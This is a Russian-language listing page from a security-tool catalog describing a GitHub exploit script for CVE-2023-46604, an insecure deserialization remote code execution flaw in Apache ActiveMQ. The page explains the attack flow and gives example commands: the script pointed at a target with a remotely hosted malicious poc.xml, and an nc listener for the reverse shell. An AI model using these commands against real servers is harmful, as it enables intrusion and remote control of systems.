Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-46604 — Скрипт эксплуатирует уязвимость небезопасной десериализации в Apache ActiveMQ (CVE-2023-46604) | Kitploit
Инструменты/GitHubGitHub/pulentoski/cve-2023-46604
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийКомандование и УправлениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubpulentoski/cve-2023-46604

CVE-2023-46604

Скрипт эксплуатирует уязвимость небезопасной десериализации в Apache ActiveMQ (CVE-2023-46604)

Репозиторий
11112 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Техническое описание атаки: CVE-2023-46604

Скрипт эксплуатирует уязвимость небезопасной десериализации в Apache ActiveMQ (CVE-2023-46604) для достижения удаленного выполнения кода на целевом сервере. Описание процесса эксплуатации

Цель уязвимости:
    Уязвимость находится в протоколе OpenWire Apache ActiveMQ.
    Она позволяет небезопасную десериализацию объектов, что может быть использовано для выполнения произвольного кода на сервере.

Предварительные требования:
    Сетевой доступ к серверу ActiveMQ.
    Вредоносный XML-файл (poc.xml), доступный по URL, который может быть достигнут целевым сервером.

Компоненты атаки:
    Python-скрипт: автоматизирует отправку вредоносной полезной нагрузки на сервер ActiveMQ.
    XML-файл (poc.xml): содержит Spring-бин, определяющий выполнение вредоносной команды (например, открытие обратной оболочки).

Шаги атаки

Подготовка полезной нагрузки:
    Скрипт создает сообщение в шестнадцатеричном формате, которое включает:
        Имя Java-класса: org.springframework.context.support.ClassPathXmlApplicationContext.
        URL вредоносного XML-файла.
    Полезная нагрузка преобразуется в последовательность байтов, которая может быть отправлена через протокол OpenWire.

Отправка полезной нагрузки:
    Скрипт открывает TCP-сокетное соединение с сервером ActiveMQ на указанном порту (по умолчанию 61616).
    Отправляет вредоносную полезную нагрузку на сервер.

Выполнение вредоносного кода:
    Сервер ActiveMQ десериализует объект, указанный в полезной нагрузке.
    Из-за небезопасной десериализации загружается и выполняется Spring-бин, определенный в XML-файле.
    Этот бин выполняет вредоносную команду (например, обратную оболочку) на сервере.

    _________________________________________________________

пример выполнения:

  • python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml

  • nc -lvnp 9001

этот скрипт был скопирован и модифицирован на испанском:https://github.com/evkl1d/CVE-2023-46604.git

Скачать инструмент